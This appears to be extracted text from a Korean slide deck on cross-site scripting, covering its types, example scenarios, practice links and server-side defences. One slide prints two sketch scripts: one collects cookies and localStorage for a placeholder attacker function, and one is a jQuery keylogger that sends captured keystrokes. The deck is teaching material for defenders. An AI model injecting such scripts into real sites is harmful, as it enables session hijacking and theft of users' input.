  • 6. 악성스크립트? http://likemilk.fun25.co.kr:15405/ 삽입 script 1 console.log(document.cookie); console.log(document); console.log(localStorage); Var hijecking = {}; hijecking.cookie = document.cookie; hijecking.document = document; hijecking.localStorage = localStorage; //알아서 코딩.. ㅎㅎ ; SendAttackerServer(hijecking); 삽입 script 2 Var input=“”; $(document).on(‘keyup’,function(event){ input+=event.key; console.log(input); input=input.replace(‘Backspace’); //등등… }); //알아서 코딩 ㅎㅎ; $(document).on(‘click’,function(event){ SendAttackerServer(input); }); 1. XSS의 정의
  • 7. 2. XSS의 유형 XSS 유형에 대해 알아보아요-!
  • 8. Reflective XSS 공격자가 악성 스크립 트가 포함된 URL을 클 라이언트에게 노출시 켜 클릭하도록 한다. Stored XSS 데이터 베이스에 악 성 스크립트를 저장 하여 클라이언트 브 라우저에서 실행 시 키게 하는 공격 DOM XSS 클라이언트에서 수 신받은 문서를 공격 자가 의도한 문서로 조작한다. 2. XSS의 유형
  • 10. 1. 순수한 스트리밍 x동사이트인줄 알고 클릭했더니 악성 Active X가 설치됨 2. 이상한 사이트를 접속했더니 바탕화면에 바로가기가 설 치된다거나 이상한 사이트가 즐겨찾기됨 3. 유용한 유틸리티 다운받을 수 있는 URL이라 선택했는데 다운받고 나니 악성프로그램. 4. 악성 플래쉬 소스를 이용한 웹페이지를 열람하게됨. Reflective XSS 공격자가 악성 스크립트 가 포함된 URL을 클라이 언트에게 노출시켜 클릭 하도록 한다. 2. XSS의 유형
  • 12. 1. 게시판에 악성 스크립트를 삽입한 글을 남기고 다른 사용 자가 해당 게시글을 읽었을 경우 악성 스크립트가 실행되게 된다. 2. 저장된 악성스크립트에 특정 돔객체의 event를 조작하는 스크립트를 삽입하여 악성스크립트를 실행하게 한다. 3. XmlHttpOpen,$.ajax, $.get, $.post 객체의 EventEmitter를 이용하여 공격자의 서버에도 피해자의 발생 데이터를 같이 받아볼 수 있도록 한다. Stored XSS 데이터 베이스에 악 성 스크립트를 저장 하여 클라이언트 브 라우저에서 실행 시 키게 하는 공격 4. 서버에서 문자열 치환 작업을 역 이용해서 스크립트를 삽 입하거나, 문자열의 인코딩을 아예 변환한 악성 스크립트를 저장하도록 한다. 2. XSS의 유형
  • 14. DOM XSS 클라이언트에서 수신 받은 문서를 공격자 가 의도한 문서로 조 작 한다. 1. 클라이언트가 읽을 수 있는 파라메터 값을 타인이 만들어 서 넣을 수 있는 기능이 있을 때 발생할 수 있다. 예: (친구의 이름:(이름에다가 악성스크립트를 넣을 때) 2. 서버에서 클라이언트에게 뿌리는 값이 다른 클라이언틀 에 의해 만들어지는 모든 입출력 데이터는 XSS 필터를 거치 고 난 후에 출력 될 수 있도록 해야한다. 2. XSS의 유형
  • 15. 3. XSS의 실습 실습을 해보아요-!
  • 16. 3. XSS의 실습 https://namu.wiki/w/XSS http://egloos.zum.com/keep/v/1030642 HTML 특수문자 인코더
  • 18. 4. 대처 방안 Server-Side 에서 XSS 필터를 구현하자 외부 플러그인 및 라이브러리를 적용시킬 때 SQL Injection 및 XSS에 대한 성능을 자가진단으로 테스트해본다. 개인정보 및 운영 정보는 Client-Side에 저장 시키는것을 지양한다. [< > “ ‘ ; : ` ! @ # $ % & * | ( ) { } ] 위와 같은 문자열을 치환해서 사 용하도록 하자.